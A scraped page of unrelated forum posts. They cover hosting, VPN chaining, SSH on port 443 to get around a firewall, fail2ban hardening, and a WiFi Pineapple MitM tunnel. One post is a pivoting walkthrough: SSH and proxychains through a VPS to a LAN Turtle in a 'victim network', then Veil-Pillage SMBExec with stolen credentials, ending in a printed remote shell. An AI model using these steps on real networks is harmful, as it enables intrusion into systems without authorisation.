Search the Community

I need web hosting. I've tried ordering from the some of the major hosting companies lately. I've had two of payment gateways just repeatedly fail. Just looses my payment information or my account information. or it doesn't like my credit card or paypal doesn't work. I'm really sick of it. So I'm looking for a smaller business to host me. Where I can send you an email with my account details and you send me back a login and the nameserver I can point my domains to. Preferably you accept PayPal. And Go!

Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was 10.13.37.27, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-10.13.37.27:445-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"

Ok, so here is what I want to accomplish... - Run Debian Linux in a VM, routing 100% of traffic (TCP/UDP/DNS) through Proxychains/VPN1 - Run Ubuntu Linux as the Host routing 100% of traffic (VM Traffic + All TCP/UDP/DNS) through VPN2 - If required to increase Anonymity, hop through anonymous VPS running proxychains as well So, it will look like this; VM (Proxychains thru VPN1) --> HOST (VPN2) --> (possible Anon VPS) Please explain how to set this up, and how to test it is working correctly.. ;) Thanks!!

Hello! I have Debian VPS. I want to connect to mullvad VPN from my VPS using openvpn. How i can properly do it ? If i just start openvpn client, i get disconnected from my VPS. Thats because my VPS is now in mullvad network. How can i make my VPS work with mullvad vpn and i still be able to connect to VPS with SSH ? Any tips or links be very helpfull. Thanks

I'm trying to set up a VPN tunnel for all traffic connected to the Pineapple in client mode, with the tunnel endpoint being my Ubuntu VPS out in the cloud. The goal here is to provide internet access to all clients connected to the Pineapple, while enabling more powerful MitM attacks like Metasploit using my VPS. I've installed OpenVPN on both my server and Pineapple and set up their respective keys, but I am at a loss now as to the proper configuration. Tun? Tap? Br0? lo? Should I be using tap0 or tun0 for each side of the tunnel? (And how does it hook into the pineapple's traffic?) Could someone kindly sketch out the ideal configs for this kind of setup? In an earlier post, Sebkinne referred a user to this "howto", which specifies the client [=pineapple] as tap0. Forgive my ignorance, but don't you want to make the OpenVPN client side [=pineapple] "tun0" and the OpenVPN tunnel's endpoint on the ubuntu server "tap0"? (Which in turn redirects internet traffic to its internet-facing eth0 interface?) I'm lost. In advance, thank very much for any help you can offer.

Keep Hackers Out Of Your Servers Most web admins all ask the same question. How do I stop these hackers and spambots from trying to break into my server? Your website is safe from hackers. Of course if we only didn’t have to use SSH this wouldn’t be a problem for most of us. Sometimes we spend far to much time securing our web application then we do our own servers. Stick to the basics. In our 100% uptime world turning off remote admin access is just not possible for most organizations, they need remote access 24/7 so wherever you might be, you can still fix problems. Not every admin is going to have a dedicated Cisco ASA Intrusion Detection System at their disposal so we need to be realistic when we are mitigating security. FAIL2BAN Fail2Ban is a wonderful tool every web admin should familiarize themselves with. It’s a very simple daemon that runs in the background scouring all through your logs.. It looks at: apache vsftp lighthttpd sshd postfix If you are reading this and using one of these services go ahead and take a peek at your logs. You are probably going to see a lot of failed login attempts from ip addresses and usernames you don’t recognize. Before I go on there is one thing I need to mention. Never Allow Root Remote Logon for SSHD As a secondary mitigation always change the port your sshd service is running on. vi /etc/ssh/sshd_confPermitRootLogin noPort 1337Now we need to install fail2ban. For Redhat based: rpm -ivh wget http://mirror.us.leaseweb.net/epel/6/i386/epel-release-6-8.noarch.rpmfail2ban is not in the standard repo for redhat boxes so we need to add EPEL repos into yum. yum install fail2banNow let’s make a new config file cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.localNow let’s look at our config. It might be wise to add known ip addresses so they will not accidentally get banned. vi /etc/fail2ban/jail.local[DEFAULT]# "ignoreip" can be an IP address, a CIDR mask or a DNS host. Fail2ban will not # ban a host which matches an address in this list. Several addresses can be # defined using space separator. ignoreip = 127.0.0.1 # "bantime" is the number of seconds that a host is banned. bantime = 3600 # A host is banned if it has generated "maxretry" during the last "findtime" # seconds. findtime = 600 # "maxretry" is the number of failures before a host get banned. maxretry = 3 Once you have added one of your own trusted ip addresses into the config let’s go over what will happen next. Essentially fail2ban crawls through all of your access logs you tell it to inside the config. If it recognizes an ip addresses trying to connect and getting a failed login, it will add them to a blacklist and apply the ban to iptables. You can preset criteria inside the config but it does a pretty good job out of the box on stopping spammers. You can also how long you want that ip address to be banned. Instead of editing your .htaccess files on your servers with fail2ban you are only blocking malicous ip addresses, not bots trying to crawl your webpage. In that case you want bots to crawl your webpage so they know what’s on it. Keep those shells locked down!

Hi All, Scenario/Background: I'm on a boat. We use VSAT + two year old Cisco router. Router has been locked down. The only ports open are 80 (http), 443 (https), 25 (mail), 3389 (RDP). When travelling I used to be able to use OpenVPN (udp), PPTP VPN (tcp), or a socksified (-D) SSH connection to tunnel my traffic. That's no longer the case. I borked my VPS server trying to get around the above stated issue. It's left me in a bit of a pickle. I can use TOR to get to my VPS's CPANEL (control panel). I have to use a service like TOR, because the CPANEL is on a non-standard web port (5454). I can't reinstall the server though. To do that I need to VNC to the VPS. I use 'Chicken of the VNC' which doesn't support proxying, like a web browser. I've looked at a few options, like NoVNC, etc which are browser based HTML5 implementations of a VNC client but they rely on a companion server which my VPS is not running. Any ideas? (1A) Help! *I'm asking a friend to remotely reconfigure my server, and to run SSH on port 443 so I'll have SSH access and web proxying ability, but it has led me to even more questions. I hope that the firewall doesn't filter to the Layer 7 networking stack, otherwise I might need a better solution. What are some ways to accomplish this? (2A) Below is what I've found so far. Please help me add to the list of possibilites. Is there a software solution (Mac OS X or Ubuntu) that allows a user to specify which application uses the socksified SSH connection (ex ssh -D 8080 username@y.y.y.y) on the local machine? (3A) It woud be ideal if an application could force traffic over the SSH connection. Example, tell 'Chicken of the VNC', Adium, etc to route through SSH without having to set a proxy in their individual preferences (most don't even have the option/ability). Future Solutions 1B. #Ubuntu wiki says this might be a problem on some VPS's - https://help.ubuntu....y/IptablesHowTo #execute on remote server iptables -t nat -I PREROUTING -p tcp -m conntrack --ctstate NEW -s x.x.x.x -d y.y.y.y --dport 443 -j REDIRECT --to-port 22 or #execute on remote server iptables -t nat -I PREROUTING --src x.x.x.x --dst y.y.y.y -p tcp --dport 443 -j REDIRECT --to-ports 22 sudo iptables -t nat -L -n -v #execute on local machine in Terminal ssh -p 443 -D 8080 username@y.y.y.y 2B. http://www.thoughtcr...tware/firemole/ 3B. http://dag.wieers.co...http-tunneling/ *anyone know of a more current way to do this? (4A) software doesn't look like it's been updated since 2009 4B. sudo nano /etc/ssh/sshd_config change the line "Port 22" to "Port 443" to save --> hit ctrl+o, then ctrl+x sudo restart ssh *how does encrypted web traffic (https 443) still work if SSH is now using port 443 on the VPS? (5A)